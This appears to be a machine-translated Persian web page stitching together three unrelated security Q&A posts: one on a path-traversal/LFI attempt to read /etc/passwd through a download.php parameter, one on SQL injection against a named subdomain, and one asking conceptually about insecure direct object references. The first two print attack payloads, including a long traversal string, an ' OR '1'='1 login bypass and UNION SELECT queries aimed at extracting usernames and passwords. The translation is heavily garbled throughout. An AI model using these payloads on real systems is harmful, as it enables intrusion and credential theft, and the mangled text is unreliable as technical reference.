url – برای عدم توانایی در وب سایت خطا با realpath PHP را بررسی کنید

من یک وب سایت با یک فایل download.php پیدا کردم که می تواند مقادیر مختلفی را در پارامتر url دریافت کند (به عنوان مثال www.example.com/download.php؟url = ارزش ). هنگامی که من ../../ را به عنوان یک مقدار برای url می نویسید، خطا در این صفحه من را در صفحه می اندازد:

 هشدار: realpath () [function.realpath]: open_basedir محدودیت در
اثر فایل (/ srv) در مسیر (های) مجاز نیست:
(.: / srv / www / example.com /: / tmp /: / usr / local / php526 / lib / php /)
در /srv/www/example.com/download.php در خط 5

آسیب پذیری های PHP realpath () را در PHP 5.26 یا پایین جستجو کردم و در این مقاله یک مقاله درباره سیستم مدیریت پرونده پی اچ پی و حملات با استفاده از این روش پیدا کردم [19659004] من میخواهم به عنوان یک فایل به پوشه / etc / passwd / دسترسی پیدا کنم تا بتوانم اطلاعات بیشتری کسب کنم.
من سعی کردم با استفاده از یک URL که طولانی تر از 4096 بایت است، اما به نظر نمی رسد که کوتاه شود و هیچ اتفاقی نمی افتد.

 www.example.com/download.php؟url = .. / .. / etc / passwd /./././././././././././. /./././././././././././././././././././././././ ./ /./././././././././././././././././././././././ ./ /./././././././././././././././././././././././ ./ /./././././././././././././././././././././././ ./ /./././././././././././././././././././././././ ./ /./././././././././././././././././././././././ ./ /./././././././././././././././././././././././ ./ /./././././././././././././././././././././././ ./ /./././././././././././././././././././././././ ./ /./././././././././././././././././././././././ ./ /./././././././././././././././././././././././ ./ /./././././././././././././././././././././././ ./ /./././././././././././././././././././././././ ./ /./././././././././././././././././././././././ ./ /./././././././././././././././././././././././ ./ /./././././././././././././././././././././././ ./ /./././././././././././././././././././././././ ./ /./././././././././././././././././././././././ ./ /./././././././ ././././././././././././././././././././././././ ././././././././././././././././././././././././ ././././././././././././././././././././././././ ././././././././././././././././././././././././ ././././././././././././././././././././././././ ././././././././././././././././././././././././ ././././././././././././././././././././././././ ././././././././././././././././././././././././ ././././././././././././././././././././././././ ././././././././././././././././././././././././ ././././././././././././././././././././././././ ././././././././././././././././././././././././ ././././././././././././././././././././././././ ././././././././././././././././././././././././ ././././././././././././././././././././././././ ././././././././././././././././././././././././ ././././././././././././././././././././././././ ././././././././././././././././././././././././ ././././././././././././././././././././././././ ././././././././././././././././././././././././ ././././././././././././././././././././././././ ././././././././././././././././././././././././ ././././././././././././././././././././././././ ././././././././././././././././././././././././ ././././././././././././././././././././././././ ././././././././././././././././././././././././ ././././././././././././././././././././././././ ././././././././././././././././././././././././ ././././././././././././././././././././././././ ././././././././././././././././././././././././ ././././././././././././././././././././././././ ././././././././././././././././././././././././ ././././././././././././././././././././././././ ././././././././././././././././././././././././ ./././././././././././././././././././././././ ./ /./././././././././././././././././././././././ ./ /./././././././././././././././././././././././ ./ /./././././././././././././././././././././././ ./ /./././././././././././././././././././././././ ./ /./././././././././././././././././././././././ ./ /./././././././././././././././././././././././ ./ /./././././././././././././././././././././././ ./ /./././././././././././././././././././././././ ./ /./././././././././././././././././././././././ ./ /./././././././././././././././././././././././ ./ /./././././././././././././././././././././././ ./ /./././././././././././././././././././././././ ./ /./././././././././././././././././././././././ ./ /./././././././././././././././././././././././ ./ /./././././././././././././././././././././././ ./ /./././././././././././././././././././././././ ./ /./././././././././././././././././././././././ ./ /./././././././././././././././././././././././ ./ /./././././././././././././././././././././././ ./ /./././././././././././././././././././././././ ./ /./././././././././././././././././././././././ ./ /./././././././././././././././././././././././ ./ /./././././././././././././././././././././././ ./ /./././././././././././././././././././././././ ./ /./././././././././././././././././././././././ ./ /./././././././././././././././././././././././ ./ /./././././././././././././././././././././././ ./ /./././././././././././.....<...>.php

curl -head website.com بازگشت

 HTTP / 1.1 200 OK
تاریخ: Mon، Jul 30، 2018 11:39:01 GMT
سرور: آپاچی / 2.2.23 (یونیکس) mod_ssl / 2.2.23 OpenSSL / 0.9.8h
نوع محتوا: text / html

چگونه می توانم با استفاده از LFI یا Path Truncation از وبسایت استفاده کنم؟ یا بهترین روش برای استفاده از این خطا چیست؟

تزریق SQL با یک URL غیر قابل تزریق

من اخیرا به یک زیر دامنه داده شدم که با SQLi: gov.ns.agency سعی و بهره برداری شود. بر خلاف آنچه که در بیشتر آموزشها مشاهده میکنم، نمیتوانم پارامترها را به نشانی اینترنتی تزریق کنم، مثل اینکه در هر جای دیگر میبینم.

این چیزی است که من سعی کردم:

  1. در صفحه ورود، هر نام کاربری با رمز عبور مناسب بود: 'OR '1' = '1 و من به gov.ns.agency /users هدایت می شود. در اینجا یک فرم باز می کند که آیا یک کاربر وجود دارد. من قصد دارم از ستون "نام" و "عبور" از جدول "کاربران" اطلاعات دریافت کنم. یک نکته نیز وجود دارد که MySQL پایگاه داده است و درخواستهای فرستاده شده GET و NOT POST با استثناء برخی از پرس و جوهایی که یک خطای داخلی سرور POST 500 را نشان می دهند وجود دارد.

  2. 'UNION ALL SELECT NULL، version ()' – MySQL بازگشتی نسخه 8.0.11 – حذف نقل قولهای تک کاربره پیدا نشد.

  3. 'UNION SELECT' یافت، COLUMN_NAME FROM information_schema.columns WHERE table_name = 'users' AND column_name LIKE 'pa٪ returned [name] Found -> [priv] گذشت من هنوز هم سرم را از دست می دهم، چه چیزی می تواند باشد، ممکن است امتیازات را توصیف کند؟ مدیر ممکن است؟

  4. 'اتحاد همه را انتخاب NULL، concat (schema_name) FROM information_schema.schemata'
    این نام DB را می دهد اما به جای آن من 500 خطای سرور داخلی را به من داد.

من کاملا جدید برای آزمایش نفوذ هستم و مطمئن نیستم که چه query ها جدول ها را دریافت می کنند و حتی چگونه از ابزارهایی مثل SQLMap یا Burpsuite برای انجام این کار، و یا حتی اینکه چگونه من به این نوع سایت مراجعه کردم، جایی که من حتی نمیتوانم پرس و جوها را به نشانی اینترنتی (معمولا در php؟ id = 123 به پایان برسد) انجام می دهم، بنابراین هر گونه راهنمایی بسیار قدردانی خواهد شد!

کنترل دسترسی – آیا یک نقطه مرجع مستقیم ناامن مستقیم به یک فایل ساده یا صفحه می تواند؟

تعريف مرجع ابرداده مستقيم ناامن (IDOR) از OWASP (تاکيد معدن)

اشاره مستقيم به ايمني مستقيم ناامن هنگامي رخ مي دهد که برنامه فراهم شود
  دسترسی مستقیم به اشیاء بر اساس ورودی کاربر ارائه شده. به عنوان یک نتیجه از
  این مهاجمان آسیب پذیر می توانند اجازه و دسترسی را از بین ببرند
  منابع در سیستم به طور مستقیم، به عنوان مثال سوابق پایگاه داده و یا
  فایل ها

لینک های ناخواسته مستقیم Object اجازه می دهد تا حمله ها را دور بزنند
  مجوز و دسترسی به منابع به طور مستقیم با تغییر مقدار از
  پارامتر مورد استفاده به طور مستقیم اشاره به یک شی
.

درک من از مورد کلی این است که اگر شما در برنامه خود که در نظر گرفته شده است حفاظت شده است و شما می توانید به طور مستقیم توسط دسترسی به اشاره به آن را در URL از شما به عنوان مشکل * .

به معنای واقعی کلمه تمام نمونه هایی از IDOR من دیده ام، همیشه از شمارش در URL (به عنوان در پاراگراف دوم از من نقل قول): یکی از دسترسی به http://example.com؟id=10 (correlicty) است، اما با دستکاری id ، او دسترسی به http: // example.com؟id=1033 که او نباید مجبور باشد.

برای من این تنها یک نمونه خاص از این آسیب پذیری است. من هم فکر می کنم (و در اینجا سؤال من است) آدرس هایی مانند

 http://example.com/menu1/menu2/topsecret/file.pdf

یا

 http://example.com/menu1/menu2/topsecret/

نیز مسائل مربوط به نکات مستقیم اشیاء ناامن (هنگام دسترسی غیرمنتظره) هستند.

آیا در فهم من درست است؟


* چرا این فقط یک "هیچ ACL" نیست، پس از آن؟ (به عنوان مثال A10 "کنترل دسترسی شکسته") از آنجا که ممکن است این صفحه هنگامی محافظت شود که شما سعی در دسترسی به آن "راه طبیعی" (به عنوان مثال از طریق منوهای که برای شما قابل مشاهده است فقط زمانی که شما دارای حقوق مناسب است)